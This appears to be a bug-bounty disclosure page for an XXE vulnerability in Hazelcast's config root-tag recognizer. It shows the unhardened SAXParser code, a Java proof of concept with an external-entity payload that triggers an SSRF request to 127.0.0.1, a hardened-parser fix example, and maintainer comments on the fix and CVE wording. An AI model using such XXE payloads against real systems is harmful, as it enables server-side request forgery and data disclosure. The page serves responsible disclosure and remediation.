Improper Restriction of XML External Entity Reference in hazelcast/hazelcast

Valid

Reported on

Jan 16th 2022


Description

The AbstractXmlConfigRootTagRecognizer() constructor builds its SAXParser from a SAXParserFactory on which FEATURE_SECURE_PROCESSING is not set, allowing XXE attacks. See https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65

    public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
        this.expectedRootNode = expectedRootNode;
        // Default factory: FEATURE_SECURE_PROCESSING is not enabled and DOCTYPE
        // declarations with external entities are accepted and resolved.
        SAXParserFactory factory = SAXParserFactory.newInstance();
        saxParser = factory.newSAXParser();
    }

    @Override
    public boolean isRecognized(ConfigStream configStream) throws Exception {
        MemberHandler memberHandler = new MemberHandler(expectedRootNode);
        try {
            // The untrusted config stream is fed to the unhardened parser here.
            saxParser.parse(configStream, memberHandler);
        }

Proof of Concept

The key function mentioned above, extracted to show how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {
        try {
            // DOCTYPE declaring an external entity; the default parser resolves it
            // while parsing and so issues a request to the declared URL.
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            // Same construction as in AbstractXmlConfigRootTagRecognizer: no
            // FEATURE_SECURE_PROCESSING, DOCTYPE and external entities allowed.
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Parsing this document causes an SSRF request to http://127.0.0.1/.

Impact

This XXE vulnerability can be used to disclose data, conduct SSRF attacks, and so on.
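The hardening the report calls for, as an added example that is not Hazelcast's code and not part of the original report: a SAXParserFactory configured to reject DOCTYPE declarations and external entities (the feature URIs are the standard Xerces/SAX ones; HardenedRootTagParser and its helper methods are hypothetical names), checked against a constructed plain document and a constructed document carrying a DOCTYPE.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedRootTagParser {

    // Hypothetical helper (not Hazelcast code): builds a SAXParser that refuses
    // DOCTYPE declarations and external entities, which is what closes the XXE hole.
    static SAXParser newHardenedParser() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Reject any DOCTYPE: config files never need one, and without a DOCTYPE
        // no entity (internal, external or parameter) can be declared at all.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a parser implementation ignores the line above.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        return factory.newSAXParser();
    }

    // Returns true when the document parsed cleanly, false when the parser rejected it.
    static boolean parses(SAXParser parser, String xml) throws Exception {
        try {
            parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                    new DefaultHandler());
            return true;
        } catch (SAXException rejected) {
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        SAXParser hardened = newHardenedParser();
        // Constructed inputs: an ordinary config root and one carrying a DOCTYPE.
        String plain = "<?xml version=\"1.0\"?><hazelcast/>";
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY e \"x\">]><foo>&e;</foo>";
        System.out.println("plain document accepted:   " + parses(hardened, plain));
        System.out.println("DOCTYPE document accepted: " + parses(hardened, withDoctype));
    }
}
```

With the hardened factory the plain document is accepted and the DOCTYPE-bearing one fails with a SAXParseException before any entity is resolved, so the request in the proof of concept is never made.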

We are processing your report and will contact the hazelcast team within 24 hours. 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
Josef Cacek validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Cacek (Maintainer), 2 years ago

The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407

Josef Cacek (Maintainer), 2 years ago

Even though the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.

Jamie Slome, 2 years ago

With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️

Josef Cacek (Maintainer), 2 years ago

The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.

Jamie Slome, 2 years ago

Okay, thanks for the update Josef and that makes sense.

We will confirm the fix for this report once you are ready to publish the report!

Josef Cacek marked this as fixed in 5.1 with commit 4d6b66 2 years ago
The fix bounty has been dropped
Josef Cacek (Maintainer), 2 years ago

@jamieslome, how can we change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."

Jamie Slome, 2 years ago

@kwart - I have updated the CVE for you 👍

https://github.com/CVEProject/cvelist/pull/5209/files

The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.

Josef Cacek (Maintainer), 2 years ago

Thanks, Jamie.
